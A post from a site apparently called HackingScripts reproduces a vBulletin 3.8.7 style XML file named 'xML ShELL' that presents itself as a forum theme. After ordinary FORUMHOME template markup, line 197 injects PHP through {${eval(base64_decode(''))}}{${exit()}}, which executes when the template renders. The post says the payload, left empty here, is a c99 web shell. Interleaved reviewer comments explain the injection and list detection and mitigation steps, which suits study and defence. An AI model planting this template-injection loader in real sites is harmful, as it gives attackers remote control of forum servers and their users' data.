HackingScripts

Hack Scripts for everybody

xML Shell

19 Feb 2014

Well, this is fascinating: an XML shell! It is packaged as a vBulletin style file marked for version 3.8.7 – coded by Hakam El Basrawy, AKA h4k4m.

xML ShELL Source Code

  1 <?xml version="1.0" encoding="ISO-8859-1"?>
    <!-- vBulletin style file (root element style, product="vb", vbversion="3.8.7") carrying one
         template, FORUMHOME. Defender's reading: the template looks like ordinary forum-home
         markup but has PHP appended near the end of its CDATA section (listing line 197), so a
         style file from an untrusted source has to be reviewed as code, not as theming data. -->
  2 <style name="~ xML ShELL bY h4k4m ~" vbversion="3.8.7" product="vb" type="custom">
    <!-- Listing line 3 is free text inside the style element: the author's banner, claiming
         coverage of versions 3.8.0 to 3.8.7. -->
  3 ALL vb-version=)> 3.8.0 t0 3.8.7  ... by Hakam El Basrawy
    <!-- NOTE(review): the leading "- " on listing lines 4 to 6 looks like a collapse marker
         copied from a browser's XML tree view, not file content. Confirm against the raw file
         before parsing or hashing this listing. -->
  4 - <templategroup name="/Forum Home">
    <!-- The date, username and version attributes below are supplied by whoever built the file.
         date="1194653840" is 10 Nov 2007 UTC if read as Unix time. Treat all three as
         attacker-controlled metadata, not as evidence for an incident timeline. -->
  5 - <template name="FORUMHOME" templatetype="template" date="1194653840" username="Hakam" version="3.8.7">
  6 - <![CDATA[ $stylevar[htmldoctype]
  7 <html dir="$stylevar[textdirection]" lang="$stylevar[languagecode]">
    <!-- Template body, listing lines 7 to 194: guest welcome box, forum table ($forumbits),
         "what's going on" box, status-icon legend and the member logout link. It is plain
         template markup ($variables plus if/phrase tags); nothing in this span calls eval or a
         decoder. For triage, diff it against the FORUMHOME template of a clean install of the
         same version rather than reading it by eye. -->
  8 <head>
  9     <!-- no cache headers -->
 10     <meta http-equiv="Pragma" content="no-cache" />
 11     <meta http-equiv="Expires" content="-1" />
 12     <meta http-equiv="Cache-Control" content="no-cache" />
 13     <!-- end no cache headers -->
 14     $headinclude
 15     <title><phrase 1="$vboptions[bbtitle]">$vbphrase[x_powered_by_vbulletin]</phrase></title>
 16 </head>
 17 <body>
 18 $header
 19 $navbar
 20 
 21 <if condition="$show['guest']">
 22 <!-- guest welcome message -->
 23 <table class="tborder" cellpadding="$stylevar[cellpadding]" cellspacing="$stylevar[cellspacing]" border="0" width="100%" align="center">
 24 <tr>
 25     <td class="tcat"><phrase 1="$vboptions[bbtitle]">$vbphrase[welcome_to_the_x]</phrase></td>
 26 </tr>
 27 <tr>
 28     <td class="alt1">
 29         <phrase 1="faq.php$session[sessionurl_q]" 2="register.php$session[sessionurl_q]">$vbphrase[first_visit_message]</phrase>
 30     </td>
 31 </tr>
 32 </table>
 33 <!-- / guest welcome message -->
 34 <br />
 35 </if>
 36 
 37 <!-- main -->
 38 <table class="tborder" cellpadding="$stylevar[cellpadding]" cellspacing="$stylevar[cellspacing]" border="0" width="100%" align="center">
 39 <thead>
 40     <tr align="center">
 41       <td class="thead"> </td>
 42       <td class="thead" width="100%" align="$stylevar[left]">$vbphrase[forum]</td>
 43       <td class="thead" width="175">$vbphrase[last_post]</td>
 44       <td class="thead">$vbphrase[threads]</td>
 45       <td class="thead">$vbphrase[posts]</td>
 46       <if condition="$vboptions['showmoderatorcolumn']">
 47       <td class="thead">$vbphrase[moderator]</td>
 48       </if>
 49     </tr>
 50 </thead>
 51 $forumbits
 52 <tbody>
 53     <tr>
 54         <td class="tfoot" align="center" colspan="<if condition="$vboptions['showmoderatorcolumn']">6<else />5</if>"><div class="smallfont"><strong>
 55             <a href="forumdisplay.php?$session[sessionurl]do=markread" rel="nofollow">$vbphrase[mark_forums_read]</a>
 56             <if condition="$vboptions['forumleaders']">   
 57             <a href="showgroups.php$session[sessionurl_q]" rel="nofollow">$vbphrase[view_forum_leaders]</a></if>
 58         </strong></div></td>
 59     </tr>
 60 </tbody>
 61 </table>
 62 $forumhome_markread_script
 63 <!-- /main -->
 64 
 65 <br />
 66 <br />
 67 
 68 <!-- what's going on box -->
 69 <table class="tborder" cellpadding="$stylevar[cellpadding]" cellspacing="$stylevar[cellspacing]" border="0" width="100%" align="center">
 70 <thead>
 71     <tr>
 72         <td class="tcat" colspan="2">$vbphrase[whats_going_on]</td>
 73     </tr>
 74 </thead>
 75 <if condition="$show['loggedinusers']">
 76 <!-- logged-in users -->
 77 <tbody>
 78     <tr>
 79         <td class="thead" colspan="2">
 80             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_activeusers')"><img id="collapseimg_forumhome_activeusers" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_activeusers].gif" alt="" border="0" /></a>
 81             <a href="online.php$session[sessionurl_q]" rel="nofollow">$vbphrase[currently_active_users]</a>: $totalonline (<phrase 1="$numberregistered" 2="$numberguest">$vbphrase[x_members_and_y_guests]</phrase>)
 82         </td>
 83     </tr>
 84 </tbody>
 85 <tbody id="collapseobj_forumhome_activeusers" style="$vbcollapse[collapseobj_forumhome_activeusers]">
 86     <tr>
 87         <td class="alt2"><a href="online.php$session[sessionurl_q]" rel="nofollow"><img src="$stylevar[imgdir_misc]/whos_online.gif" alt="$vbphrase[view_whos_online]" border="0" /></a></td>
 88         <td class="alt1" width="100%">
 89             <div class="smallfont">
 90                 <div style="white-space: nowrap"><phrase 1="$recordusers" 2="$recorddate" 3="$recordtime">$vbphrase[most_users_ever_online_was_x_y_at_z]</phrase></div>
 91                 <div>$activeusers</div>
 92             </div>
 93         </td>
 94     </tr>
 95 </tbody>
 96 <!-- end logged-in users -->
 97 </if>
 98 <tbody>
 99     <tr>
100         <td class="thead" colspan="2">
101             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_stats')"><img id="collapseimg_forumhome_stats" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_stats].gif" alt="" border="0" /></a>
102             <phrase 1="$vboptions[bbtitle]">$vbphrase[x_statistics]</phrase>
103         </td>
104     </tr>
105 </tbody>
106 <tbody id="collapseobj_forumhome_stats" style="$vbcollapse[collapseobj_forumhome_stats]">
107     <tr>
108         <td class="alt2"><img src="$stylevar[imgdir_misc]/stats.gif" alt="<phrase 1="$vboptions[bbtitle]">$vbphrase[x_statistics]</phrase>" border="0" /></td>
109         <td class="alt1" width="100%">
110         <div class="smallfont">
111             <div>
112                 $vbphrase[threads]: $totalthreads,
113                 $vbphrase[posts]: $totalposts,
114                 $vbphrase[members]: $numbermembers<if condition="$show['activemembers']">,
115                     <span title="<phrase 1="$vboptions[activememberdays]">$vbphrase[within_the_last_x_days]</phrase>">$vbphrase[active_members]: $activemembers</span>
116                 </if>
117             </div>
118             <div><phrase 1="member.php?$session[sessionurl]u=$newuserid" 2="$newusername">$vbphrase[welcome_to_our_newest_member_x]</phrase></div>
    <!-- NOTE(review): $cb_stats on the next line is not obviously a stock variable and its
         indentation differs from its neighbours; presumably it comes from an add-on. Confirm
         against a clean FORUMHOME before treating it as benign. -->
119 <div class="smallfont">$cb_stats</div>
120         </div>
121         </td>
122     </tr>
123 </tbody>
124 <if condition="$show['birthdays']">
125 <!-- today's birthdays -->
126 <tbody>
127     <tr>
128         <td class="thead" colspan="2">
129             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_birthdays')"><img id="collapseimg_forumhome_birthdays" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_birthdays].gif" alt="" border="0" /></a>
130             $vbphrase[todays_birthdays]
131         </td>
132     </tr>
133 </tbody>
134 <tbody id="collapseobj_forumhome_birthdays" style="$vbcollapse[collapseobj_forumhome_birthdays]">
135     <tr>
136         <td class="alt2"><a href="calendar.php?$session[sessionurl]do=getday&day=$today&sb=1"><img src="$stylevar[imgdir_misc]/birthday.gif" alt="$vbphrase[view_birthdays]" border="0" /></a></td>
137         <td class="alt1" width="100%"><div class="smallfont">$birthdays</div></td>
138     </tr>
139 </tbody>
140 <!-- end today's birthdays -->
141 </if>
142 <if condition="$show['upcomingevents']">
143 <tbody>
144     <tr>
145         <td class="thead" colspan="2">
146             <a style="float:$stylevar[right]" href="#top" onclick="return toggle_collapse('forumhome_events')"><img id="collapseimg_forumhome_events" src="$stylevar[imgdir_button]/collapse_thead$vbcollapse[collapseimg_forumhome_events].gif" alt="" border="0" /></a>
147             <if condition="$show['todaysevents']">$vbphrase[todays_events]<else /><phrase 1="$vboptions[showevents]">$vbphrase[upcoming_events_for_the_next_x_days]</phrase></if>
148         </td>
149     </tr>
150 </tbody>
151 <tbody id="collapseobj_forumhome_events" style="$vbcollapse[collapseobj_forumhome_events]">
152     <tr>
153         <td class="alt2"><a href="calendar.php$session[sessionurl_q]"><img src="$stylevar[imgdir_misc]/calendar.gif" alt="$vbphrase[calendar]" border="0" /></a></td>
154         <td class="alt1" width="100%"><div class="smallfont">$upcomingevents</div></td>
155     </tr>
156 </tbody>
157 </if>
158 </table>
159 <br />
160 <!-- end what's going on box -->
161 
162 <!-- icons and login code -->
163 <table cellpadding="0" cellspacing="2" border="0" width="100%">
164 <tr valign="bottom">
165     <td>
166         <table cellpadding="2" cellspacing="0" border="0">
167         <tr>
168             <td><img src="$stylevar[imgdir_statusicon]/forum_new.gif" alt="$vbphrase[contains_new_posts]" border="0" /></td>
169             <td class="smallfont">  $vbphrase[forum_contains_new_posts]</td>
170         </tr>
171         <tr>
172             <td><img src="$stylevar[imgdir_statusicon]/forum_old.gif" alt="$vbphrase[contains_no_new_posts]" border="0" /></td>
173             <td class="smallfont">  $vbphrase[forum_contains_no_new_posts]</td>
174         </tr>
175         <if condition="$vboptions['showlocks']">
176         <tr>
177             <td><img src="$stylevar[imgdir_statusicon]/forum_old_lock.gif" alt="$vbphrase[a_closed_forum]" border="0" /></td>
178             <td class="smallfont">  $vbphrase[forum_is_closed_for_posting]</td>
179         </tr>
180         </if>
181         </table>
182     </td>
183     <if condition="!$show['guest']">
184         <!-- member logout -->
    <!-- The logout URL below carries $bbuserinfo[logouthash]; presumably a per-user anti-CSRF
         value checked by the logout handler. Confirm against login.php. -->
185         <td align="$stylevar[right]"><a href="login.php?$session[sessionurl]do=logout&logouthash=$bbuserinfo[logouthash]"  onclick="return log_out('$vbphrase[sure_you_want_to_log_out]')"><phrase 1="$bbuserinfo[username]">$vbphrase[log_out_x]</phrase></a></td>
186         <!-- end member logout -->
187     </if>
188 </tr>
189 </table>
190 <!-- / icons and login code -->
191 
192 $footer
193 </body>
194 </html>
195 
196 $spacer_open
197 {${eval(base64_decode(''))}}{${exit()}}&
198 $_phpinclude_output
199   ]]> 
    <!-- Listing lines 196 to 198 sit after the closing html tag and are the part of the template
         that is not forum markup. Line 197 wraps two PHP calls in {${ }}: eval(base64_decode(''))
         and exit(). If the platform evaluates template text as a PHP string (presumably how
         vBulletin 3.x compiles templates; confirm for the version in use), those calls run when
         FORUMHOME is rendered instead of being printed, and exit() then ends the request. The
         base64 argument is an empty string in this listing, so as shown it decodes to nothing.
         Detection: search imported style XML and stored templates for eval(, base64_decode(,
         exit( and ${ and treat any hit as needing review. Mitigation: limit style import and
         template editing to trusted administrators, review third-party style files before
         import, and diff stored templates against a clean install of the same version. -->
200   </template>
201   </templategroup>
202   </style>

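The encoded part (the base64 string passed to base64_decode() on line 197, left empty in the listing above) is simply a c99 shell, by the way. Base64 is an encoding rather than encryption, so it hides the payload from a casual read but not from anyone who decodes it.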